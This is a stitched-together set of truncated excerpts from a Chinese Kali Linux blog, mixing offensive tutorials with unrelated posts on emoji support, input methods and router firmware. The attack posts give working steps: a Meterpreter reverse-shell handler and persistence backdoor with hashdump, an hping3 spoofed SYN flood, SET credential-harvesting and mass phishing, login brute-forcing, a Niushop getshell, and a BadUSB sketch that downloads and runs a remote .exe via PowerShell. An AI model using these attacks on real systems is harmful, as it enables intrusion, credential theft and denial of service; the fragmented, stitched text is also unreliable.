Linux Kali高级学习教程

软件特性本软件功能强大，由各种顶级黑客技术结合而成，基本功能覆盖面广，可满足大多数人的基本需求。 此外软件高度定制化，拥有插件功能，可使用各种强大的插件来丰富软件功能。 日站综合根据域名/IP一键攻击或一键使用0day攻击 可选各种漏洞进行一键攻击、提权 综合功能：挂黑页、DDOS、社管理员全家、日后台、挂马、断室友网 百度、谷歌批量日站、免费上网、破解各种网吧 盗QQ号、刷Q币、刷会员、刷心悦3、日运营商免费打电话充话费 进内网、翻墙、澳门赌场、IP定位、顺着网线砍人 日教务系统、挖洞、发布漏洞、自动代码审计、读内存 破解根据文件一键破解、逆源码 一键注释代码（AI）、激活系统、激活所有软件、日穿系统、生成POC 一键破解手机应用、游戏、汉化、汉化并steam差评+1 CTF一键日平台、出flag、偷flag、生成wp、搅屎、断网 一键交易、改排名、自动做题（AI） 一键锤爆出题人的头 无线 一键蹭Wifi、中间人、看妹子手机里的自拍 一键伪基站、窃听、做钓鱼Wifi 硬件 一键日无人机、日ATM、偷银行卡、充饭卡、日卫星 一键保佑服务器不宕机、日穿CPU、烧随机硬件 其它 玄学许愿，出货率UP 实验性功能（AI）：一键绿帽、自动与妹子尬聊、提升好感度 插件支持各种语言（包括但不限于C(C ++)、Java、Python、Ruby、Javascript、php、C#……） 甚至，可以使用txt、exe等文件做插件 项目地址传送门 版权属于：逍遥子大表哥 本文链接：https://blog.bbskali.cn/643.html…

一：先注册花生壳并下载花生壳客户端 二：点击内网穿透 内网为你kali的ip地址，端口为5555 然后点击提交即可。 三：生成木马在生成木马时，我们需要花生壳的ip和端口 点击诊断，即可查看花生壳的ip 花生壳的端口： 域名后面的，即为花生壳的端口。 四：配置msfconsole需要注意的是，在配置msfconsole时，我们不能配置花生壳的端口和ip，应该是我们kali本机的ip和端口。 use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.3.209 set LPORT 5555 版权属于：逍遥子大表哥 本文链接：https://blog.bbskali.cn/652.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

前期条件需要签约当面付（可找人代开 十几元即可搞定）应用以上线 需要下载RSA签名验签工具点我下载 参数配置运行RSA签名验签工具 点击生成密匙 如下，会生成相应的公匙和密匙 保存公匙和密匙 打开蚂蚁金服开发平台 打开应该公匙将我们刚才保存的公匙填入即可。 然后分别记录 APPID 应用私匙 支付宝公匙即可 版权属于：逍遥子大表哥 本文链接：https://blog.bbskali.cn/653.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

前言在综合前人的基础上，对typecho邮件评论模板进行了更新，修复了配色方案以及自适应效果。在文章末尾即可下载。代码owner代码 <base target="_blank" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <meta charset="utf-8"> <style type="text/css"> ::-webkit-scrollbar{ display: none; } </style> <style id="cloudAttachStyle" type="text/css"> #divNeteaseBigAttach, #divNeteaseBigAttach_bak{display:none;} </style> <div class="container" style="max-width:500px;margin:20px auto;background-color:#fff;box-shadow:1px 1px px #888888;border-radius:10px;font-family:-apple-system,BlinkMacSystemFont,&quot;"> <div class="mail-box" style="width:100%;"> …

moji表情随着IOS的普及和微信的支持越来越常见，比如这些比较常见的表情：⭐️ ? ✨ ⚡️ ? ?。所谓Emoji就是一种在Unicode位于\u1F601-\u1F64F区段的字符。这个显然超过了目前常用的UTF-8字符集的编码范围\u0000-\uFFFF。在 MySQL 中，UTF-8只支持最多 3 个字节，而 emoji 是 4 个字节。 Typecho默认不支持emoji表情，其实不是程序的锅，而是由于编码的问题，只需要将默认的数据库编码utf8修改为utf8mb4即可，当然别忘了，utf8mb4编码只有在PHP5.5以后才支持。 简单两步即可让typecho支持emoji 1.修改数据库编码进入PhpMyadmin，选择您的数据库，操作--》整理--》选择utf8mb4_unicode_ci 2.修改数据库表编码直接运行以下sql语句 alter table typecho_comments convert to character set utf8mb4 collate utf8mb4_unicode_ci; alter table typecho_contents convert to character set utf8mb4 collate utf8mb4_unicode_ci; alter table typecho_fields convert to character set utf8mb4 collate utf8mb4_unicode_ci; alter table typecho_metas conve…

说明：前几天看到了个很强大的新项目，py12306购票助手，支持分布式，多账号，多任务购票，还带了很方便的Web管理界面，支持各种通知，比如微信，电话语音，邮件等。现在貌似到了抢票的季节了，所以博主就分享一下该工具的手动安装和Docker安装，有需求的可以用下。功能多日期查询余票自动打码下单用户状态恢复电话语音通知多账号、多任务、多线程支持单个任务多站点查询分布式运行Docker支持动态修改配置文件邮件通知Web管理页面微信消息通知 手动安装Github地址：https://github.com/pjialin/py12306 环境要求： Python 3.6以上的版本。 安装Python 3.6sudo apt-get update sudo apt-get install python3.6查看是否安装完成 python3 --version 安装pip3apt-get install python3-pip -y安装完成pip3后我们安装依赖环境 git clone https://github.com/pjialin/py12306 cd py12306 pip3 install -r requirements.txt配置程序复制配置文件 cp env.py.example env.py然后编辑该配置文件，填入你的账号等信息，建议使用FTP工具访问VPS后编辑该文件。 部分配置说明，其它配置就参考配置文件里面的说明，挺详细了 1、自动打码 目前支持免费打码，和若快打码 注：免费打码无法保证持续可用，如失效请手动切换到若快平…

最近不少小伙伴在群里面讨论怎样安装输入法，其实在论坛中我之前就发布过这篇教程，今天给大家在总结下。 1. 安装fcitxapt-get install fcitxPS:顺利的话会自动安装成功，如果遇到依赖错误，按提示修复或者输入apt-get -f install修复，但是如果提示“依赖xxx，但是xxx将不会被安装”，这一般是源太旧，建议换个其他的源。 2. 安装fcitx-libs-qtapt-get install fcitx-libs-qt 3.安装搜狗输入法去搜狗输入法官网http://pinyin.sogou.com/linux/ 下载自己系统对应版本的输入法安装包。 3.1 安装搜狗输入法cd ~/下载/也可以文件浏览器在定位到下载目录，右击选择在终端中打开 dpkg -i 下载的sogo安装包文件名 嗯，提示错误，因为是部分依赖还没有安装，我们缺什么安装什么就行了。 或者执行命令apt --fix-broken install 然后，我们重新执行下面命令 dpkg -i sogoupinyin_2.2.0.0108_amd64.deb 可以看到，没有报错。证明已经安装成功。 4.启用搜狗输入法终端中输入： im-config 进入输入法配置，选择确定，然后点击是，在弹出来的输入法选择框中选择fcitx，然后确定 。 注销账号，重新登录，然后右上角有个键盘图标，点击选择【设置】，在左下角点击【+】新增输入法 在弹出窗口中取消“仅显示当前预览”复选框，然后搜索Sogou,找到搜狗输入法，点击OK 打开编辑器，“Ctr…

Niushop开源商城采用thinkphp5.0+MySQL开发语言开发,完全开源商城系统,可以用于企业,个人建立自己的网上免费商城,支持开源微信商城,开源小程序,开源新零售。下载链接：http://www.niushop.com.cn/download.html Version：单商户 2.2 安装爆破MySQL密码GET /niushop/install.php?action=true&dbserver=127.0.0.1&dbpassword=root2&dbusername=root&dbname=niushop_b2c HTTP/1.1 Host: 127.0.0.1 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Referer: http://127.0.0.1/niushop/install.php?refresh Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: action=db Connection: close 爆破成功返回1，密码错误返回0 getshell 上传图片只做了前端校验…

攻击过程：你使用hping3执行拒绝服务攻击(即DoS)。你隐藏你的a$$(我是指你的源头IP地址)。你的目标机器看到的将是随机性源头IP地址中的源头，而不是你的IP地址(IP伪装)。你的目标机器会在5分钟里面不堪重负，停止响应。ok，我们进行简单的模拟攻击： 先用nmap扫描内网存活主机 nmap -sP 192.168.1.1/24 我们的攻击目标是智能手机。 输入命令hping -S --flood -V IP 开始攻击 我们来看看攻击的效果 ok 这时候 手机已经呈现断网状态 按下ctrl+c关闭，这时候我们看看发送了多少数据 这个数据包很客观的了。 另外就是隐藏IP攻击目标 命令是这样的： hping3 -S -U --flood -V --rand -source IP怎样防止DOS攻击如果是网站，可以让网站接入CDN加速。 版权属于：逍遥子大表哥 本文链接：https://blog.bbskali.cn/712.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

终端输入setoolkit启动 依次选择 Social-Engineering Attacks Website Attack Vectors Credential Harvester Attack Method Web Templates 选择所要伪造的钓鱼页面 在局域网的另一台电脑上，在浏览器下输入攻击机的ip地址 会出现google的登陆页面 当我们输入账号和密码，在后台就会得到。 版权属于：逍遥子大表哥 本文链接：https://blog.bbskali.cn/717.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

一般来说，用户的登录方式有三种： （1）命令行登录（2）ssh登录（3）图形界面登录对于运行级别为5的图形方式用户来说，他们的登录是通过一个图形化的登录界面。登录成功后可以直接进入 KDE、Gnome 等窗口管理器。 而本文主要讲的还是文本方式登录的情况：当我们看到mingetty的登录界面时，我们就可以输入用户名和密码来登录系统了。 Linux 的账号验证程序是 login，login 会接收 mingetty 传来的用户名作为用户名参数。 然后 login 会对用户名进行分析：如果用户名不是 root，且存在 /etc/nologin 文件，login 将输出 nologin 文件的内容，然后退出。 这通常用来系统维护时防止非root用户登录。只有/etc/securetty中登记了的终端才允许 root 用户登录，如果不存在这个文件，则 root 用户可以在任何终端上登录。 /etc/usertty文件用于对用户作出附加访问限制，如果不存在这个文件，则没有其他限制。 版权属于：逍遥子大表哥 本文链接：https://blog.bbskali.cn/744.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

准备神器burp字典一份网站后台系统（以路由器登录后台为列） 启动burp软件我已经共享了，大家可以看这里！ 拦截数据我们在后台中随便输入一个账号和密码，并在burp中截取数据。 右键 选择 send to truder 切换到truder界面 在positions界面，点击右边的clear$ 然后选择刚才输入的账号和密码 分别点击Add$ 然后点击 Payloads选项卡点击load载入字典。 在length中我们可以看到，值不同的则为密码。 下载可以去论坛哦！ 版权属于：逍遥子大表哥 本文链接：https://blog.bbskali.cn/723.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

一般来说，用户的登录方式有三种： （1）命令行登录（2）ssh登录（3）图形界面登录 <?php echo "hellow"; ?>对于运行级别为5的图形方式用户来说，他们的登录是通过一个图形化的登录界面。登录成功后可以直接进入 KDE、Gnome 等窗口管理器。 而本文主要讲的还是文本方式登录的情况：当我们看到mingetty的登录界面时，我们就可以输入用户名和密码来登录系统了。 Linux 的账号验证程序是 login，login 会接收 mingetty 传来的用户名作为用户名参数。 然后 login 会对用户名进行分析：如果用户名不是 root，且存在 /etc/nologin 文件，login 将输出 nologin 文件的内容，然后退出。 这通常用来系统维护时防止非root用户登录。只有/etc/securetty中登记了的终端才允许 root 用户登录，如果不存在这个文件，则 root 用户可以在任何终端上登录。 /etc/usertty文件用于对用户作出附加访问限制，如果不存在这个文件，则没有其他限制。点击下载 Default Primary Success Info Warning Danger图形模式与文字模式的切换方式Linux预设提供了六个命令窗口终端机让我们来登录。 默认我们登录的就是第一个窗口，也就是tty1，这个六个窗口分别为tty1,tty2 … tty6，你可以按下Ctrl + Alt + F1 ~ F6 来切换它们。 如果你安装了图形界面，默认情况下是进入图形界面的，此时你就可以按Ctrl…

本来一直就用的阿里云的服务器，这两天想给网站添加CDN服务，刚开始用的是又拍云，但是效果不是很明显，试了下阿里云的cdn效果杠杠的。可是晚上睡觉的时候，发来短信却说劳资有他们阿里云的二毛钱欠费，mmp后台登录看了下，是cdn产生的费用！在认真看了下，说是先使用后扣费！艹！！！ 没办法，看了下，有卖的流量包，于是又买了100GB的流浪包，可是买后又发现居然是全站加速的！日了狗！ 打算放弃CDN了！ 版权属于：逍遥子大表哥 本文链接：https://blog.bbskali.cn/761.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

首先，准备一个要发送的邮箱文件（一行一个邮箱地址）。 示例文件 email.txt： [email protected] [email protected] [email protected] 启动Social Engineering Toolkit：启动setoolkit 选择1，然后选择5： 选择2，群发。添入email.txt文件路径： 你现在有两个选择，一个使用gmail发送，一个是使用自己的邮件服务器发送。 我使用gmail发送，选择1。 填入你的gmail邮箱地址、密码等等信息。然后按照提示输入邮件主题内容等等。 来自看守所的温馨提示！ 自娱自乐即可！请勿恶意攻击！ 版权属于：逍遥子大表哥 本文链接：https://blog.bbskali.cn/762.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

建立持续后门当我们成功获取shell后，再次建立链接显得特别麻烦，那么有什么方法可以解决此问题呢。在前期的教程中，我讲过讲msf的进程转移的其他软件的方法，今天来看看另外的一种方法。 执行命令 run persistence -U -A -i 10 - 8090 -r 192.168.232.194其中 192.168.232.194为kali的ip 我们可以看到，在 C:\WINDOWS\TEMP\IGlPDkq.vbs下生成了一个vbs脚本。并且在注册表中也加入了相应的值，如开机启动。 这样，当对方电脑关机或者重启，我们同样能得到反弹会话。 获取凭证hashdump模块（post）可以从SAM数据库中导出本地用户账号，credential_collector脚本（post/windows/gather/credentials）也可以从目标设备中收集令牌信息。 run post/windows/gather/hashdump 脚本和post模块都需要通过“run”命令执行,数据的输出格式为：用户名：SID：LM哈希：NTLM哈希:::。运行程序我们还可以使用“execute”命令在目标系统中执行应用程序。这个命令的使用方法如下： execute -f<file> [Options]运行后它将执行file参数所指定的文件。可选参数如下： -H：创建一个隐藏进程 -a：传递给命令的参数 -i：跟进程进行交互 -m：从内存中执行 -t：使用当前伪造的线程令牌运行进程 -s：在给定会话中执行进程 创建一个新账号接下来，我们可以在…

利用nmap怎么扫描已知的漏洞呢？ 执行命令：nmap -v --script=smb-vuln-*.nse --script-args=unsafe=1 ip -Pn我们可以看到，当前服务器存在ms08-067和ms17-010漏洞 版权属于：逍遥子大表哥 本文链接：https://blog.bbskali.cn/784.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

前言去年买的魅族极速版路由器，本是看见有广告过滤的插件，所以才买的，但是用了一段时间发现插件已经不能用了。而且魅族这方面也已经停止了对路由器的更新，打算扔掉换个新的。但是又有点浪费，在看了大神的几篇文章后，成功将魅族路由器刷入了padavad固件。 路由器刷padavad准备网线一根padavad固件ftfp64 （所有文档已打包附件，文章末尾下载即可。） 刷入固件 注意事项1、最好将杀毒软件关掉，有时候tftp32.exe程序可能会被杀毒软件误杀2、如果是win7或以上的系统，工具和固件最好不要放在C盘，防止被UAC等防火墙禁掉3、请确保电脑网卡设置成了10.10.10.3的地址，以前有用户误将宽带拨号的网络标示当成网卡来设置了4、上电后松开按钮的时间不能太晚也不能太早，太晚或太早都会导致TFTP无反应，升级不成功 特别注意：进入救援模式（刷机模式）时务必记住先断开电源（拔掉电源线），之后按住wps按键不放，然后接通电源线，等待4-7秒后松手。 在TFTP出现路由请求接收固件文件成功后，等待3分钟以上，重启路由器即可。 成功后可以登录192.168.123.1（一般是）进入web管理，默认管理账户admin密码admin，wifi密码1234567890。 成功界面 配置某V 可自行搭建Shadowsocks将参数填入配置中，访问某谷可在浏览器中输入地址即可，无需其他软件做代理。 广告屏蔽 固件下载点击下载 提取码:581s 填坑输入后会发现三个口都成了LAN无法设置上网，可在外置设置——端口隔离和 VLAN 过滤中设置如下，即可解决…

准备badusbArduino 下载软件点击下载 运行软件 在工具菜单中 选择，选择badusb的端口和开发版。 注入代码windows10系统#include <Keyboard.h> void setup() { Keyboard.begin();//开始键盘通讯 delay(1000);//延时 Keyboard.press(KEY_LEFT_GUI);//win键 delay(500); Keyboard.press('r');//r键 delay(500); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); delay(500); Keyboard.println("powershell -Command $clnt = new-object System.Net.WebClient;$url= 'https://bbskali.cn/8888.exe';$file = ' %HOMEPATH%\\windows.exe ';$clnt.DownloadFile($url,$file);%HOMEPATH%\\windows.exe;"); Keyboard.press(KEY_RETURN); Keyboard.release(KEY_RETURN); Keyboard.press(KEY_CAPS_LOCK); Keyboar…

夜景雪景中山桥兰州